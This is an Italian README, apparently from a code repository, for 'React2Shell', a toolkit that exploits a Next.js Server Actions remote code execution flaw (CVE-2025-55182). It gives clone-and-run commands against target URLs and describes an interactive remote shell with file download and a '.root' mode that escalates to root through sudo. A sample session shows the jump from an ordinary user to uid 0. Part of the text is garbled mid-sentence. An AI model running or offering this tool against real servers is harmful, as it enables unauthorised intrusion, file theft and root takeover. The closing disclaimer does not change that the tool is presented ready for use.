
Toolkit di sfruttamento avanzato per le Server Actions di Next.js (CVE-2025-55182)
Toolkit avanzato di sfruttamento per le Server Actions di Next.js (CVE-2025-55182).
React2Shell è un potente wrapper di shell interattivo progettato per sfruttare la vulnerabilità React2Shell. Va oltre la semplice RCE offrendo cronologia dei comandi, funzionalità di trasferimento file e strategie automatizzate di escalation dei privilegi.
base64 | sudo -i) per bypassare le restrizioni della shell ed escalare a root all'istante..download <remote> [local]: download di file affidabile e binary-safe tramite codifica base64..save: salva l'output del comando in file di evidenza locali.
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests
python3 react2shell.py -u https://target-nextjs-site.com/
Esegui con rilevamento verificato della strategia di persistenza root:
python3 react2shell.py -u https://target.com/
Una volta all'interno della shell:
| Comando | Descrizione |
|---|---|
.root | Attiva/disattiva la Modalità Root (avvolge i comandi in sudo -i) |
.download <file> | Scarica un file dal server remoto |
.save | Salva l'output dell'ultimo comando in un file |
.exit | Esci dalla shell |
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Root mode ENABLED
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)
SOLO A SCOPO EDUCATIVO. Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e ai test autorizzati. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento. Non scansionare o sfruttare target per cui non hai esplicita autorizzazione al test.
Sviluppato per test di penetrazione etici e operazioni di red team.